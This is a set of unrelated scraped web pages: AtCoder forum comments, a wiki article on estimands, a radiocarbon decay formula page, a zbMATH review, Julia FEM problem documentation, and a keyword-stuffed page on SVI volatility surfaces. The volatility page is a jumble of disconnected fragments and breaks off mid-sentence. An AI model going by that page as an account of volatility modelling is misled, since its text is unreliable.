» 2 months ago, # | 0 In problem A "Seat Occupation" I see that my submission 36675947 sent during the contest was correct except that "Yes" (resp. "No") was replaced by "yes" (resp. "no"). If the evaluation is CASE SENSITIVE, it should be clarified in the statement. CodeChef and CodeForces are not case sensitive. Sorry, but I can only blame the author. submission with wrong case: https://atcoder.jp/contests/arc152/submissions/36675947 submission with correct case: https://atcoder.jp/contests/arc152/submissions/37023059
» 5 weeks ago, # | 0 It seems that output values for the first 23 tests for problem D in dropbox (here) are all empty.
https://handwiki.org/wiki/Estimand | # Estimand
An estimand is a quantity that is to be estimated in a statistical analysis.[1] The term is used to more clearly distinguish the target of inference from the method used to obtain an approximation of this target (i.e., the estimator) and the specific value obtained from a given method and dataset (i.e., the estimate).[2] For instance, a normally distributed random variable $\displaystyle{ X }$ has two defining parameters, its mean $\displaystyle{ \mu }$ and variance $\displaystyle{ \sigma^{2} }$. A variance estimator: $\displaystyle{ s^{2} = \sum_{i=1}^{n} \left. \left( x_{i} - \bar{x} \right)^{2} \right/ (n-1) }$,
yields an estimate of 7 for a data set $\displaystyle{ x = \left\{ 2, 3, 7 \right\} }$; then $\displaystyle{ s^{2} }$ is called an estimator of $\displaystyle{ \sigma^{2} }$, and $\displaystyle{ \sigma^{2} }$ is called the estimand.
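Working that example through with sample mean $\displaystyle{ \bar{x} = 4 }$ gives $\displaystyle{ s^{2} = \frac{(2-4)^{2}+(3-4)^{2}+(7-4)^{2}}{3-1} = \frac{14}{2} = 7 }$: the rule $\displaystyle{ s^{2} }$ is the estimator, the value $7$ is the estimate, and the unknown $\displaystyle{ \sigma^{2} }$ is the estimand.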
## Definition
In relation to an estimator, an estimand is the quantity of interest, such as the outcome under the different treatments being compared, that the estimator is intended to approximate. It can formally be thought of as any quantity that is to be estimated in any type of experiment.[3]
## Overview
An estimand is closely linked to the purpose or objective of an analysis. It describes what is to be estimated based on the question of interest.[4] This is in contrast to an estimator, which defines the specific rule according to which the estimand is to be estimated. While the estimand will often be free of specific assumptions (e.g., regarding missing data), such assumptions will typically have to be made when defining the specific estimator. For this reason, it is logical to conduct sensitivity analyses using different estimators for the same estimand, in order to test the robustness of inference to different assumptions.[5]
According to Ian Lundberg, Rebecca Johnson, and Brandon M. Stewart, quantitative studies frequently fail to define their estimand.[1] This is problematic because it becomes impossible for the reader to know whether the statistical procedures in a study are appropriate unless they know the estimand.[1]
## Examples
If our question of interest is whether instituting an intervention such as a vaccination campaign in a defined population in a country would reduce the number of deaths in that population, then our estimand will be some measure of risk reduction (e.g. it could be a hazard ratio, or a risk ratio over one year) that would describe the effect of starting a vaccination campaign. We may have data from a clinical trial available to estimate the estimand. In judging the effect on the population level, we will have to reflect that some people may refuse to be vaccinated, so that excluding those in the clinical trial who refused to be vaccinated from the analysis may be inappropriate. Furthermore, we may not know the survival status of all those who were vaccinated, so that assumptions will have to be made in this regard in order to define an estimator.
One possible estimator for obtaining a specific estimate might be a hazard ratio based on a survival analysis that assumes a particular survival distribution conducted on all subjects to whom the intervention was offered, treating those who were lost to follow-up to be right-censored under random censorship. It might be that the trial population differs from the population, on which the vaccination campaign would be conducted, in which case this might also have to be taken into account. An alternative estimator used in a sensitivity analysis might assume that people, who were not followed for their vital status to the end of the trial, may be more likely to have died by a certain amount.
### Epidemiological
In establishing clinical trials, practitioners often want to focus on measuring the effects of their treatments on a population of individuals. These clinical settings are built around ideal scenarios, far removed from any intercurrent events. However, as this will often not be the case in reality, variability needs to be taken into account during the planning and execution of these trials.[6] By building foundational objectives around the idea of the estimand framework in clinical medicine, practitioners can align the clinical study objective with the study design, endpoint, and analysis to improve study planning and the interpretation of the analysis.[7] Essentially, the estimand provides a way to explicitly state how these intercurrent events will be dealt with in achieving the objective of the treatment in question.
## ICH
On October 22, 2014, the International Council for Harmonisation of Technical Requirements for Pharmaceuticals for Human Use (ICH) produced a final concept paper titled Choosing Appropriate Estimands and Defining Sensitivity Analyses in Clinical Trials as an addendum to their E9 guidance.[8] On 16 October 2017 ICH announced that it had published the draft addendum on defining appropriate estimands for a clinical trial/sensitivity analyses for consultation.[9][10] The final addendum to the ICH E9 guidance was released on November 20, 2019.[11]
By providing a structured framework for translating the objectives of a clinical trial to a matching trial design, conduct and analysis ICH aims to improve discussions between pharmaceutical companies and regulators authorities on drug development programs. The ultimate goal is to make sure that clinical trials provide clearly defined information on the effects of the studied medicines.[10]
## References
1. Lundberg, Ian; Johnson, Rebecca; Stewart, Brandon M. (2021). "What Is Your Estimand? Defining the Target Quantity Connects Statistical Evidence to Theory" (in en). American Sociological Review 86 (3): 532–565. doi:10.1177/00031224211004187. ISSN 0003-1224.
2. Mosteller, F.; Tukey, J. W. (1987). "Data Analysis, including Statistics". The Collected Works of John W. Tukey: Philosophy and Principles of Data Analysis 1965–1986. 4. CRC Press. pp. 601–720 [p. 633]. ISBN 0-534-05101-4.
3. Lawrance, Rachael; Degtyarev, Evgeny; Griffiths, Philip; Trask, Peter; Lau, Helen; D’Alessio, Denise; Griebsch, Ingolf; Wallenstein, Gudrun et al. (24 August 2020). "What is an estimand & how does it relate to quantifying the effect of treatment on patient-reported quality of life outcomes in clinical trials?". Springer. pp. 68. doi:10.1186/s41687-020-00218-5.
4. National Research Council (2010). The Prevention and Treatment of Missing Data in Clinical Trials. Panel on Handling Missing Data in Clinical Trials. Committee on National Statistics, Division of Behavioral and Social Sciences and Education.. Washington, DC: The National Academies Press.
5. International Conference on Harmonisation of Technical Requirements for Registration of Pharmaceuticals for Human Use (2014). Draft (final) concept paper on choosing appropriate estimands and definining sensitivity analyses in confirmatory clinical trials.
6. Team, Statistical Consultancy. "Estimands – What you need to know" (in en-us).
7. International Council for Harmonisation of Technical Requirements for Pharmaceuticals for Human Use (2019). "ICH E9 Addendum on Estimands".
http://refereed.ru/radiometric-dating-calculus-equations-26638.html | # Radiometric dating calculus equations
The last figure I heard was that there are currently eight nuclear subs on our ocean floors. Radiocarbon comes from cosmic rays that rain down on the earth (and us) from outer space. Radiocarbon dating can be used on samples of bone, cloth, wood and plant fibers, but it doesn't work for sea creatures and other things that are under water. Then they measure how much is left in the specimen when they find it. The half-life of a radioactive isotope describes the amount of time that it takes half of the isotope in a sample to decay.
The exponential decay formula is given by: $$m(t) = m_0 e^{rt}$$ where $$r = \frac{\ln(1/2)}{h}$$, $$h$$ is the half-life of Carbon-14 (approximately 5730 years), and $$m_0$$ is the initial mass of the radioactive substance.
It’s the time it takes for half of a batch of radioactive atoms to decay away. We can relate $$\tau_{1/2}$$ to $$\lambda$$ easily using the formula derived above.
We just say we start with $$N_0=100$$ atoms and calculate the $$t$$ it takes for this to drop to $$N=50$$.
WARNING: there is a little bit of calculus involved.
We start by noting that the speed of radioactive decays occurring in a sample is proportional to the number of radioactive atoms in the sample. If you had 10 jumping beans and saw one jump every second, you’d expect to see about 10 jumps per second if you had 100.
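Written out, that proportionality is a short differential equation (standard calculus added here for completeness, not quoted from the original page): $$\frac{dN}{dt} = -\lambda N \quad\Rightarrow\quad N(t) = N_0 e^{-\lambda t},$$ and setting $$N(t)=N_0/2$$ gives the half-life $$\tau_{1/2} = \frac{\ln 2}{\lambda}.$$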
https://zbmath.org/?q=an%3A0807.62030 | ## Efficiency versus robustness: The case for minimum Hellinger distance and related methods. (English) Zbl 0807.62030
Summary: It is shown how and why the influence curve poorly measures the robustness properties of minimum Hellinger distance estimation. Rather, for this and related forms of estimation, there is another function, the residual adjustment function, that carries the relevant information about the trade-off between efficiency and robustness. It is demonstrated that this function determines various second-order measures of efficiency and robustness through a scalar measure called the estimation curvature. The function is also shown to determine the breakdown properties of the estimators through its tail behavior.
A 50% breakdown result is given. It is shown how to create flexible classes of estimation methods in the spirit of $$M$$-estimation, but with first-order efficiency (or even second-order efficiency) at the chosen model, 50% breakdown and a minimum distance interpretation.
### MSC:
62F35 Robustness and adaptive procedures (parametric inference)
62F12 Asymptotic properties of parametric estimators
http://docs.juliadiffeq.org/latest/types/fem_types.html | FEM Problems
# FEM Problems
Below are the definitions of the types which specify problems. Some general notes are:
• (t,x) vs (t,x,y): Mathematically one normally specifies equations in 2D as $f(t,x,y)$. However, in this code we use x as a vector. Thus you can think of $x$=x[:,1] and $y$=x[:,2], and input equations are of the form f(x,t) no matter the dimension. If time is not included in the problem (for example, a Poisson equation problem), then we use f(x). For example, the equation $u(x,y)= \sin(2πx)\cos(2πy)/(8π^2)$ would be specified as sol(x) = sin(2π.*x[:,1]).*cos(2π.*x[:,2])/(8π*π).
• Linearity: If the equation has a linear term, they are specified with functions f(t,x). If it is nonlinear, it is specified with functions f(t,x,u). The boundary conditions are always (t,x)
• Stochastic: By default the equation is deterministic. For each equation, one can specify a σ term which adds a stochastic $σ(t,x,u)dW_t$ term to the equation (or with $σ(t,x)dW_t$ if linear, must match f). $dW_t$ corresponds to the type of noise which is chosen. By default this is space-time Gaussian white noise.
## Poisson Equation Problem
Wraps the data that defines a 2D linear Poisson equation problem:
$-Δu = f$
with boundary conditions gD on the Dirichlet boundary and gN on the Neumann boundary. Linearity is determined by whether the forcing function f is a function of one variable (x) or two (u,x) (with x=x[:,1] and y=x[:,2]).
If the keyword σ is given, then this wraps the data that defines a 2D stochastic heat equation
$-Δu = f + σdW$
### Constructors
PoissonProblem(f,analytic,Du,mesh): Defines the Dirichlet problem with analytical solution analytic, solution gradient Du = [u_x,u_y], and forcing function f
PoissonProblem(u0,f,mesh): Defines the problem with initial value u0 (as a function) and f. If your initial data is a vector, wrap it as u0(x) = vector.
Note: If all functions are of (x), then the program assumes it's linear. Write your functions using the math to program syntax translation: $x$ = x[:,1] and $y$ = x[:,2]. Use f=f(u,x) and σ=σ(u,x) (if specified) for nonlinear problems (with the boundary conditions still (x)). Systems of equations can be specified with u_i = u[:,i] as the ith variable. See the example problems for more help.
### Keyword Arguments
• gD = Dirichlet boundary function
• gN = Neumann boundary function
• σ = The function which multiplies the noise $dW$. By default σ=0.
• noisetype = A string which specifies the type of noise to be generated. By default noisetype=:White for Gaussian Spacetime White Noise.
• numvars = The number of variables in the Poisson system. Automatically calculated in many cases.
• D = Vector of diffusion coefficients. Default is D=ones(1,numvars).
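Putting the constructor and keywords together, a nonlinear Poisson problem might be set up roughly as follows (a sketch only, not from the original docs: the mesh object and the package exporting PoissonProblem are assumed to be available):

f(u,x) = 1 .- u ./ 2                  # nonlinear forcing, so the two-argument form f(u,x) is used
u0(x)  = fill(0.5, size(x,1))         # homogeneous initial value of 1/2 at every node
prob   = PoissonProblem(u0, f, mesh)  # mesh is a previously constructed FEM mesh (assumed)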
## Heat Equation Problem
Wraps the data that defines a 2D heat equation problem:
$u_t = Δu + f$
with boundary conditions gD on the Dirichlet boundary and gN on the Neumann boundary. Linearity is determined by whether the forcing function f is a function of two variables (t,x) or three (t,x,u) (with x=x[:,1] and y=x[:,2]).
If the keyword σ is given, then this wraps the data that defines a 2D stochastic heat equation.
$u_t = Δu + f + σdW_t$
### Constructors
• HeatProblem(analytic,Du,f,mesh): Defines the Dirichlet problem with solution analytic, solution gradient Du = [u_x,u_y], and the forcing function f.
• HeatProblem(u0,f,mesh): Defines the problem with initial value u0 (as a function) and f. If your initial data is a vector, wrap it as u0(x) = vector.
Note: If all functions are of (t,x), then the program assumes it's linear. Write your functions using the math to program syntax translation: $x$ = x[:,1] and $y$ = x[:,2]. Use f=f(t,x,u) and σ=σ(t,x,u) (if specified) for nonlinear problems (with the boundary conditions still (t,x)). Systems of equations can be specified with u_i = u[:,i] as the ith variable. See the example problems for more help.
### Keyword Arguments
• gD = Dirichlet boundary function
• gN = Neumann boundary function
• σ = The function which multiplies the noise dW. By default σ=0.
• noisetype = A string which specifies the type of noise to be generated. By default noisetype=:White for Gaussian Spacetime White Noise.
• numvars = Number of variables in the system. Automatically calculated from u0 in most cases.
• D = Array which defines the diffusion coefficients. Default is D=ones(1,numvars).
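Similarly, a linear heat-equation setup could look like the following sketch (same assumptions as the Poisson sketch above; the Gaussian initial condition mirrors the example problem listed below):

f(t,x) = zeros(size(x,1))                                          # no forcing, linear form f(t,x)
u0(x)  = exp.(-10 .* ((x[:,1] .- 0.5).^2 .+ (x[:,2] .- 0.5).^2))   # Gaussian bump at (1/2,1/2)
prob   = HeatProblem(u0, f, mesh)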
## Example Problems
Examples problems can be found in DiffEqProblemLibrary.jl.
To use a sample problem, you need to do:
# Pkg.add("DiffEqProblemLibrary")
using DiffEqProblemLibrary
### Poisson Equation
Nonlinear Poisson equation with $f(u)=1-u/2$ and $f(v)=.5u-v$ and initial condition homogeneous 1/2. Corresponds to the steady state of a homogeneous reaction-diffusion equation with the same $f$.
Problem with deterministic solution: $u(x,y)= \sin(2πx)\cos(2πy)/(8π^2)$ and additive noise $σ(x,y)=5$
Nonlinear Poisson equation with $f(u)=1-u/2$ and $f(v)=1-v$ and initial condition homogeneous 1/2. Corresponds to the steady state of a homogeneous reaction-diffusion equation with the same $f$.
Problem defined by the solution: $u(x,y)= \sin(2πx)\cos(2πy)/(8π^2)$
Nonlinear Poisson equation with $f(u)=1-u/2$. Corresponds to the steady state of a homogeneous reaction-diffusion equation with the same $f$.
### Heat Equation
Homogeneous reaction-diffusion which starts at 1/2 and solves the system $f(u)=1-u/2$ and $f(v)=1-v$
Homogeneous reaction-diffusion which starts with 1/2 and solves the system $f(u)=1-u/2$ and $f(v)=.5u-v$
Example problem defined by the solution:
$u(x,y,t)=\exp(-10((x-\frac{1}{2})^2 + (y-\frac{1}{2})^2 )-t)$
This is a Gaussian centered at $(\frac{1}{2},\frac{1}{2})$ which diffuses over time.
Homogeneous stochastic reaction-diffusion problem which starts with 0 and solves with $f(u)=1-u/2$ with noise $σ(u)=10u^2$
Example problem defined by the solution:
$u(x,y,t)=\frac{1}{10}(1-\exp(-100(t-\frac{1}{2})^2))\exp(-25((x-t+0.5)^2 + (y-t+0.5)^2))$
This will have a mound which moves across the screen. Good animation test.
Example problem which starts with a Dirac δ centered at (0.5,0.5) and solves with $f=gD=0$. This gives the Green's function solution.
Homogeneous reaction-diffusion problem which starts with 0 and solves with $f(u)=1-u/2$
http://urgd.autismart.it/svi-volatility-surface-python.html | Svi Volatility Surface Python
Arbitrage free SVI Surface. A better approach might be to use some kind of avg volatility surface with VIX as a baseline, but even that leaves you with no sentiment. We show how this result can help in interpreting SVI parameters. 8) needs about 20 minutes on my device to calculate these. Installing the wheel package, updating to setuptools 6. Trade Volatility-Quoted FX options and be part of the expansion of our liquidity pool to new market participants and with triangulation, the most significant technological innovation in our FX options since their inception. plot_surface (X, Y, Z, *args, **kwargs) ¶ Create a surface plot. The implied volatility of a European option on a particular asset as a function of strike price and time to maturity is known as the asset's volatility surface. View the list of Numerix Models About The Numerix CrossAsset Library The Numerix CrossAsset library offers the industry's most comprehensive collection of models and methods, allowing institutions to price any conceivable instrument using the most advanced calculations. implied volatility surfaces whose shapes differ substantially from that of the empirically observed volatility surface. This example shows how to use two different methods to calibrate the SABR stochastic volatility model from market implied Black volatilities. Properly calibrated volatility 2009 2010 10 15 15. These analyses require a high-quality, smooth, implied volatility surface as an input, along with the simulation of all intermediate spot prices until maturity, using short time steps. The model has two key properties that are often stated in the literature that followed as reasons for its popularity amongst practitioners. To deal with the rest of the volatility surface, we build a time dependent SVI-type (Gatheral, 2004) model which matches the ATM and extreme moneyness structure. Interpolation¶. Jacquier, Quant. This approach has also been used in studies of manufacturing invento-ries, e. exp (-x * x / 2. 2 Example of a linearly interpolated LVG-volatility surface cali-brated to a market quoted EURUSD implied volatility surface. This makes the term structure SVI surface particularly suitable for pricing exotics under a Dupire local volatility framework. Additionally, the assumption of constant volatility of returns which predicts a at implied volatility surface is unrealistic as it is a well known empirical fact that implied volatility is not constant as a function of strike nor as a function of time to maturity and generally exhibits some skewness commonly referred to as a volatility smile. Hands on experience with building a robust python application to analyze the dynamics of the implied volatility surface; Practical experience with analyzing the performance of various volatility models; Quantitative model development experience. how to price barrier option under local vol model using QuantLib I use QuantLib in Python. Brian will discuss a technique and script for calculating implied volatility for option prices in the Black-Sholes formula using Pandas and nag4py. Arco heeft 6 functies op zijn of haar profiel. Heston Stochastic Local Volatility Model Klaus Spanderen1 R/Finance 2016 University of Illinois, Chicago May 20-21, 2016 1Joint work with Johannes Göttker-Schnetmann Klaus Spanderen Heston Stochastic Local Volatility Model 2016-05-20 1 / 19. 
Mercurio⁄ 1 Introduction In the foreign exchange (FX) options market away-from-the-money options are quite ac-tively traded, and quotes for the same type of instruments are available everyday with very narrow spreads (at least for the main currencies). We show how this result can help in interpreting SVI parameters. Autocallable. László Nagy 1. Below you see the at-the-money strikes and normal vols quoted as of 10 Apr 2018. A more effective solution might be to use Quantlib in Python (caveat: I haven't tried it but am confident that QL can do it). In the constant volatility case, it is well known that the price of an American call option can be decomposed into the sum of a corresponding European call and an early exercise premium term. • Developed and validated exotic derivatives model including Asian/Lookback, Autocall, Barriers, using MC/FD techniques. Optimization will give you the closest parameter match, but without visualization techniques, you have no idea whether the match makes sense across the entire surface. Bilinear interpolation is used as default; this can be changed by the setInterpolation. Arbitrage free SVI Surface. The concept of volatility smile can be extended to options at different maturities to construct a surface. Ve el perfil completo en LinkedIn y descubre los contactos y empleos de Ignacio en empresas similares. And next a plot to compare the mean of the implied volatilities and the fitted volatility: And 2 more plots, one with the RSS vs Std Dev and another with the MSE vs Std Dev. is called the implied volatility surface at date , i. Computing with Data. Contribute to kangzhan/SVI-Surface development by creating an account on GitHub. See the complete profile on LinkedIn and discover Prashant’s connections and jobs at similar companies. Part II Volatility Python offers a particularly convenient mechanism for accessing data in HDF files using the PyTables module: 1. Ask Question Asked 4 years, 5 months ago. skews) in the implied volatility surface produced by inverting market prices and solving for the unknown volatility parameter (e. The user can replicate the case studies with the code, also provided. Become a Volatility Trading Analysis Expert in this Practical Course with Python. Two Stochastic Volatility Processes - American Option Pricing. Arbitrage-free SVI volatility surfaces. JupyterCon 2017 : The first Jupyter Community Conference will take place in New York City on August 23-25 2017, along with a satellite training program on August 22-23. A Nadaraya-Watson estimator with a quartic kernel is employed, Aït-Sahalia, and Lo (1998) , Aït-Sahalia and Lo (2000) , Härdle (1990) , Härdle, Müller, Sperlich, and Werwatz (2002). Introduction The stochastic volatility inspired or SVI parameterization of the implied volatility surface was originally devised at Merrill Lynch in 1999. Take a look at the dataframe below and observe the structure of the data, which has been slightly modified after downloading from NSE’s website for Nifty50 options. Arbitrage-free interpolation of implied volatilities by [1], [3], [8], [10]. A volatility surface renders a volatility measure, such as implied volatility or forward volatility, along the dimensions of both strike and time to maturity. Assist traders to choose the right model to price client requests. We also discuss extensively the notion of arbitrage freeness and Roger Lee's moment formula using the recent analysis by Roper. 400+ Case studies use real data, SVI implied volatility surface. 
1 2 U XX+ ˆ˙ U X + 1 2 ˙2 U + r 1 2 U X + + ( t) 0 t U rU U ˝ = 0 where 0 tis the market price of volatility risk. In practice, the SVI parameters fitted independently evolve in a given surface on each slice in a smooth manner, mostly monotonically. Different stochastic volatility models such as the Heston model [2], [4] or the SABR model [6] have been used to construct such stochastic volatility models. Monte Carlo Options Pricing in Two Lines of Python Tom Starke September 1, 2017 Uncategorized 0 This is an old video that I produced sitting on my bed in the morning in order to learn how to make basic Youtube videos. 0 # and standard deviation 1. Analysis of tick volatility vs bid-ask implied volatility. y The performance of the. Welcome back to PyData Singapore 2016!! Agenda • The Anatomy of Deep Learning Networks - Raymond Chan Raymond will dissect the workings of a simple multi-layer neural network (rebranded as Deep Learning) from the view point of non-linear regression. pyplot as plt import pandas as pd import seaborn as sns. Volatility and Commodity Price Dynamics 1031 2The exogeneity of volatility is consistent with informational efficiency in the spot and futures markets. models, termed stochastic-local volatility models, combine the local volatility model of Dupire [5] with a stochastic volatility model. We first come. Brian fitted varying degrees of polynomials to the volatility curves, then examined the volatility surface and its sensitivity with respect to the interest rate. Sehen Sie sich das Profil von Christian Crispoldi auf LinkedIn an, dem weltweit größten beruflichen Netzwerk. Keywords IVP, SVI, gSVI, SABR, arbitrage-free volatility surface, positive semi-definite implied. In this article, we show how to calibrate the widely used SVI parameterization of the implied volatility smile in such a way as to guarantee the absence of static arbitrage. For this implementation example, Heston stochastic volatility model has been used. Volatility depends on four factors for organic compounds: 1) Branched chained hydrocarbons are more. We focus our attention on stochastic volatility models. 4 Even as Health Care Bill Passes House It's a market worthy of Monty Python's philosophers' soccer game, where everyone standing around, waiting for. I'm not sure what your argument is otherwise. [2] showed how to parameterize the volatility surface so as to preclude dynamic arbitrage. Plotting Volatility Smile in Python. Local volatility model. Using with Python distribution tools Python package developers should download and use this compiler to produce binary wheels for their Python packages to upload to PyPI. The affine one-factor models. The source of implied volatility data is ivolatilty. GENERALIZED ARBITRAGE-FREE SVI VOLATILITY SURFACES 621 conditionsforagiventwo-dimensionalfunction(ofstrikeandmaturity)tobeaproperimplied volatility surface, i. First, let's convert a. Allows predicting the P&L change for any movement in the volatility surface, therefore, hedging more than parallel movements. In this paper we develop a no-arbitrage condition for the evolution of a volatility surface. Another complimentary package that is based on this data visualization library is Seaborn , which provides a high-level interface to draw statistical graphics. The implied volatility surface obtained from inverting the Black and Scholes (1973) for-mula is the key input parameter for pricing illiqud, exotic, or other non-listed derivatives consistently with the markets. 
Heston Stochastic Local Volatility Model Klaus Spanderen1 R/Finance 2016 University of Illinois, Chicago May 20-21, 2016 1Joint work with Johannes Göttker-Schnetmann Klaus Spanderen Heston Stochastic Local Volatility Model 2016-05-20 1 / 19. parameterizations of the implied volatility surface are still widely considered to be futile. Here is a free online arithmetic standard deviation calculator to help you solve your statistical questions. Visit here for other QuantLib Python examples. The Volatility Surface is now in its second printing; thanks to the efforts of many attentive readers, errors in the first printing have been corrected in this printing. A volatility surface of a currency pair shows how implied volatilities vary by moneyness/profitability and maturities. 2 This is exactly true if we ignore uncertainties relating to interest rates and dividends. Reichmann, and Prof. Anyway, so this is just a video showing you what happened to the volatility surface, the implied volatility surface of the S&P 500 during the financial crisis. Step 1 When you find a position you're interested in, click the 'Apply' button. As implied by its name, a volatility surface is a three-dimensional graph that plots implied volatilities across option strikes and terms to maturity. It might be surprising at first to learn that getting local volatilities from the implied volatility surface is very difficult in practice given that we have a reasonably straightforward formula for doing that. GARCH is derived from ARCH, i. (nagyl{at}finance. pyplot as plt import pandas as pd import seaborn as sns. The volatility surface, sigma K, T, is a function of the strike K and the expiration, T. In particular, we exhibit a large class of arbitrage-free SVI volatility surfaces with a simple closed-form representation. A better approach might be to use some kind of avg volatility surface with VIX as a baseline, but even that leaves you with no sentiment. Since the Black Scholes equation is a continuous function of volatility on (0, 1) we can use a NAG root finder to locate such volatility*. Anyway, so this is just a video showing you what happened to the volatility surface, the implied volatility surface of the S&P 500 during the financial crisis. Heston Model: A type of stochastic volatility model developed by associate finance professor Steven Heston in 1993 for analyzing bond and currency options. Importing Libraries. As such, not only does it relate option volatility to strike as does a volatility smile, it also depicts the term structure of volatility for an option contract, much like a yield curve. Here, I’ll provide four of them. The evaporation heat (enthalpy) of water at temperature at 20oC is 2454 kJ/kg. I implemented the implied volatility surface construction in Python and the script is attached below. is a PhD student in the Department of Finance at Budapest University of Technology and Economics in Budapest, Hungary. I used to use the EOD Realtime on TRTH v1 via the GUI, is there an equivalent here to retrieve the EOD needed to build an equity volatility surface on a stock (for each option ric, i need the bid/ask close, settlement price and the volatility at the end of day) ? Here is the python code i have at this moment (i removed my password and username):. These analyses require a high-quality, smooth, implied volatility surface as an input, along with the simulation of all intermediate spot prices until maturity, using short time steps. Optimal Delta Hedging for Options I. Downloadable! 
In this article we propose a generalisation of the recent work of Gatheral and Jacquier on explicit arbitrage-free parameterisations of implied volatility surfaces. This tutorial explains the basics of NumPy such as its. We offer an intuitive and flexible family of nested parametric curves, way beyond standard curves like SSVI and SVI (which we also offer). Take a look at the dataframe below and observe the structure of the data, which has been slightly modified after downloading from NSE’s website for Nifty50 options. Variance swaps can be replicated by a delta-hedged portfolio of vanilla options, so that pricing reflects volatilities across the entire skew surface. Introduction Static arbitrage SVI formulations SSVI Numerics Previous work Calibration of SVI to given implied volatility data (for example [12]). [1] showed how to parameterize the volatility surface so as to preclude dynamic arbitrage. For example, if you are graphing mathematical functions, examining the depth of a lake or height of a mountain, or modeling multiple dimensions in the stock market. Optimization will give you the closest parameter match, but without visualization techniques, you have no idea whether the match makes sense across the entire surface. Pricing Exotics under the Smile1 Introduction The volatility implied from the market prices of vanilla options, using the Black Scholes formula, is seen to vary with both maturity and strike price. 2 Volatility Modeling. As it was meant to be an overview of the RDP Library, I only covered a fraction of the currently available IPA content. Method 1: Calibrate Alpha, Rho, and Nu Directly. Abstract In this paper we consider the pricing of an American call option whose underlying asset dynamics evolve under the influence of two independent stochastic volatility processes of the Heston (1993) type. Existence of implied volatility. We further exhibit an arbitrage-free volatility surface different from Gatheral's SVI parameterisation. The results in Python are similar to those in Gnu R - However, not the runing time of the programs. This volatility is then denoted as the implied volatility observed in the market. Given such a set of consistent SSVI parameters, we show that the most natural interpolation. You can calculate the market implied volatility for each option by simply typing in the market price of the option in the column labelled "Market Price" and the volatility implied by the option's market value will show in the column "Implied Volatility". No-arbitrage properties of the implied volatility surface: Slope. Pathway ® is a ready-to-use cut-surface herbicide with no mixing required, which includes a blue dye for ease of inspection. The impacts of the two models are controlled by volatility surface. A more effective solution might be to use Quantlib in Python (caveat: I haven't tried it but am confident that QL can do it). 047 kg/s) The energy loss and required heat supply can be reduced by. We demonstrate the high quality of typical SVI fits with a numerical example using recent SPX. The complication is related to the risk-neutral valuation concept. , Miron and Zeldes (1988) and Ramey (1991). Arbitrage-free interpolation of implied volatilities by [1], [3], [8], [10]. 1 Local Volatility Surface In our local volatility surface project, there are mainly two ways to build local volatility surface. python - Interpolation on DataFrame in pandas I have a DataFrame, say a volatility surface with index as time and column as strike. 
Implied volatility σimp is the volatility value σ that makes the Black-Scholes value of the option equal to the traded price of the option. Keywords IVP, SVI, gSVI, SABR, arbitrage-free volatility surface, positive semi-definite implied. In particular, we exhibit a large class of arbitrage-free SVI volatility surfaces with a simple closed-form representation. The exact volatility surface for example 1, Gatteral J, Jauqier A and 2014 Arbitrage-free SVI volatility surfaces Quant, Finance 14 59–71. The concept of volatility smile can be extended to options at different maturities to construct a surface. If you are a new user, please see our IVolLive embedded Options Chain Advanced Options service provides full and complete information on the entire options chain of a given underlying instrument. Through the interpolation method, we can generate the implied volatility surface of SPY options for both put and call options as follows:. In this brief review, we highlight some empirical observa-tions that are most relevant for the construction and validation of realistic models of the volatility surface for equity indices. As such, not only does it relate option volatility to strike as does a volatility smile, it also depicts the term structure of volatility for an option contract, much like a yield curve. Table of contents 1 No Arbitrage SABR 2 ZABR, SVI 3 Linear TSR CMS Coupon Pricer 4 CMS Spread Coupons 5 Credit Risk Plus 6 Gaussian1d Models 7 Simulated Annealing 8 Runge Kutta ODE Solver 9 Dynamic Creator of Mersenne Twister 10 Questions Peter Caspers (IKB) QuantLib Erlk onige December 4th 2014 3 / 47. - Arbitrage-free implied volatility surfaces (SVI & SSVI) - Volatility calibration of two-factor Gaussian term structure models - Least-Square Monte Carlo + 933 Artillery Paju, South Korea Squadleader Mar2007–Mar2009 National service Education + National University of Singapore Singapore Ph. This parameterization has two key properties that have led to its subsequent. Consultez le profil complet sur LinkedIn et découvrez les relations de Simon, ainsi que des emplois dans des entreprises similaires. [1] showed how to parameterize the volatility surface so as to preclude dynamic arbitrage. Jacquier, Quant. Calibration of the Volatility Surface Erik Nilsson [email protected] 3 Risk Reversal A risk reversal is a highly-traded structure consisting of a long call and a short put. See the full presentation in the video below:. Over 800,000 US equity options available intraday data. Implied Volatility with Python's Pandas Library AND Python in Excel. 1 Scop e Whether in investment banks, hedge funds or clearing houses, risk managing at the portfolio level has become an active. The volatility value used here is an estimxate of the future realised price volatility. In addition to the actual Monte Carlo algorithm and path generator, I also implemented a simple method for calibrating Heston model to volatility surface by using SciPy optimization package. The model improves the SVI by allowing more flexibly the negative curvature in the tails which is justified both theoretically and empirically. 8) needs about 20 minutes on my device to calculate these. is a PhD student in the Department of Finance at Budapest University of Technology and Economics in Budapest, Hungary. Volatility swaps, options on variance swaps. Files for py-implied-vol, version 0. R takes a facade approach, python follows the original cpp Quantlib path of power and complexity, therefore my question. OptionMetrics. 
Here's an example of constructing this surface on a historical date. 4 Even as Health Care Bill Passes House It's a market worthy of Monty Python's philosophers' soccer game, where everyone standing around, waiting for. The Black-Scholes volatility surfaces generated by Heston's model look like empirical implied volatility surfaces. In this article we propose a generalisation of the recent work of Gatheral and Jacquier on explicit arbitrage-free parameterisations of implied volatility surfaces. This example shows how to use two different methods to calibrate the SABR stochastic volatility model from market implied Black volatilities. We further exhibit an arbitrage-free volatility surface different from Gatheral's SVI. The code is optimized for readability instead of performance. De Marco, Friz: Large deviations for di usions and local volatilities, working paper, 2012. Derivatives risk drivers: Heston arbitrage-free implied volatility surface. Independently developed benchmarking models in Python to validate Vendor and Internal Models - Volatility Modeling: SVI volatility interpolation with butterfly arbitrage correction, FX volatility. a flat volatility surface implies a lot of 50/50 probabilities), but for any advanced historical analysis (which seems to be the scope of this post), you. Finally, calibrated model and process are being returned for any further use. You can calculate the market implied volatility for each option by simply typing in the market price of the option in the column labelled "Market Price" and the volatility implied by the option's market value will show in the column "Implied Volatility". I have evenly spaced data that is in 3 1-D arrays instead of the 2-D arrays that matplotlib's plot_surface wants. , to generate arbitrage-free European option prices. Enter the set of values in the online SD calculator to calculate the mean, standard deviation, variance and population standard deviation. Tshepang Lekhonkhobe. 4 show the effect of varying ‰. Bekijk het volledige profiel op LinkedIn om de connecties van Arco en vacatures bij vergelijkbare bedrijven te zien. Gatheral Baruch College, The City University of New York. The ability to calibrate implied volatility surfaces from option surfaces and interpret the results. Estimation/Prediction Approaches. Files for py-implied-vol, version 0. is called the implied volatility surface at date , i. The implied volatility of a European option on a particular 